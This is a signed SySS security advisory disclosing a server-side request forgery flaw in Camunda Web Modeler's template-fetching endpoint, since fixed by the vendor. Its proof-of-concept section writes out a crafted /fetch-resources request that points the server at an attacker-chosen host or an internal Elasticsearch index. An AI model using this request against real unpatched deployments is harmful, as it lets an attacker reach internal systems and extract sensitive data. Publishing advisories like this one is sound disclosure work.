-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID:               SYSS-2025-040 
Product:                   Camunda Web Modeler
Manufacturer:              Camunda Services GmbH 
Affected Version(s):       8.5, 8.6, 8.7
Tested Version(s):         8.6.3
Vulnerability Type:        Server-Side Request Forgery (CWE-918) 
Risk Level:                High
Solution Status:           Fixed
Manufacturer Notification: 2025-05-28
Solution Date:             2025-08-19
Public Disclosure:         2025-08-27
CVE Reference:             Not yet assigned
Author of Advisory:        Nicola Staller, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

Camunda Web Modeler is a web-based application for process modeling.
The manufacturer describes the product as follows (see [1]):

"Modeler is our visual design tool that empowers both low-code and pro-code
users to design, collaborate on, and implement end-to-end processes in Camunda.

By building with open standards like BPMN and DMN, business and IT are aligned
through a shared model, common language, and a unified approach to process
development. Combine this with the flexibility to work in the way that fits
your team, and you get better, more efficient workflows, delivered faster."

Due to trusting client-provided data, Web Modeler is vulnerable to server-side
request forgery (SSRF).

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

Web Modeler allows loading templates in the template marketplace. When
loading such a template, a request containing a user-controlled URL is 
issued. Modifying the URL allows attacks on other systems.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

Issue a request from an authenticated user context to the URL 
https://<HOST>/fetch-resources?url=https://<YOUR SERVER> and observe that
the server tries to fetch resources from the specified server.

Depending on the configured environment, it may even be possible to
access internal systems such as an Elasticsearch endpoint and fetch
sensitive information from it:

GET /fetch-resources?url=http://<ELASTICSEARCH ENDPOINT>:<ELASTICSEARCH PORT>/<ELASTICSEARCH INDEX>/_search HTTP/2
Host: <HOST>
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Authorization: Bearer <VALID JWT>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

This vulnerability has been backported to Camunda 8.5, 8.6, and 8.7.
Ensure using a patched version.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2025-05-23: Vulnerability discovered
2025-05-28: Vulnerability reported to manufacturer
2025-08-19: Patch released by manufacturer
2025-08-27: Public disclosure of vulnerability

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for Camunda Modeler
    https://camunda.com/en/platform/modeler/
[2] SySS Security Advisory SYSS-2025-040
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2025-040.txt
[3] SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Nicola Staller of SySS
GmbH.

E-Mail: nicola.staller@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Nicola_Staller.asc
Key ID: 0x41DD2290
Key Fingerprint: A127 394A F398 B097 2332  637C 9DF3 39F9 41DD 2290 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is" 
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS website.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 4.0
URL: https://creativecommons.org/licenses/by/4.0/deed.en

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEoSc5SvOYsJcjMmN8nfM5+UHdIpAFAmisXSoACgkQnfM5+UHd
IpDnQw/+OtwWg1YYHy7kVfcmZLc3TbfiUiZhp7S/djW2ThxXZgIwAW3ueXS/W01N
IhdDn+UayH1yICMTSQChoBMBW/d/1rhQAONjiymGWTYFy5mroSnuAKNiEb2Nrhcu
UPMbyNsUOTDWkMY+00z3J1/C/G1axt/iprzq7OXm1J1qneNrUPF8VVODJ3icsMl6
zkcehe5c9ulPAU35Xzd/0ubTOVn9kmATKSPWWNY8Hwoy7Y9goLVIBJ/sUQhQJNNr
Vo3nnkCGgi7sOUWjoyQIxx57ftDItrHgrTrW+4c/rI9rEGmaxQxkO4XT5vzzXvK8
oqoxWG2iakIui9lVbM4ZPO9qhIPexIOwuil+4fKRTEmxDFstPK8qjAFjVrHcfL1o
UuMpFB/l1epGGKLtiIbaQQjLju3IBrn+1ROeylDx8zsXXqPFAVtoUwEhfQFNOS/M
PRoTJ6TKeXvE6IKzkfTax4idn3zq5mzd90A0qNNCjg0YWnyVCs7j2a0vMwIvFRid
QmoQNTlg/g5stQ3/tcoxp9U3T6iwjw0ursuHbYWbSdlO/Ahi+QqePUGBuuKSRxtt
YYVtYGEd/HG5lSKkDSJPdxXI4ch0YWTLo4uThZC1HlMmsmjD0f6vP6Yl6cQpgIUi
jx+pr1pAwP4ZFvTtY46ueWvGcYoxTuyBTQj1Oz1Cuyv793ruzkY=
=YXwo
-----END PGP SIGNATURE-----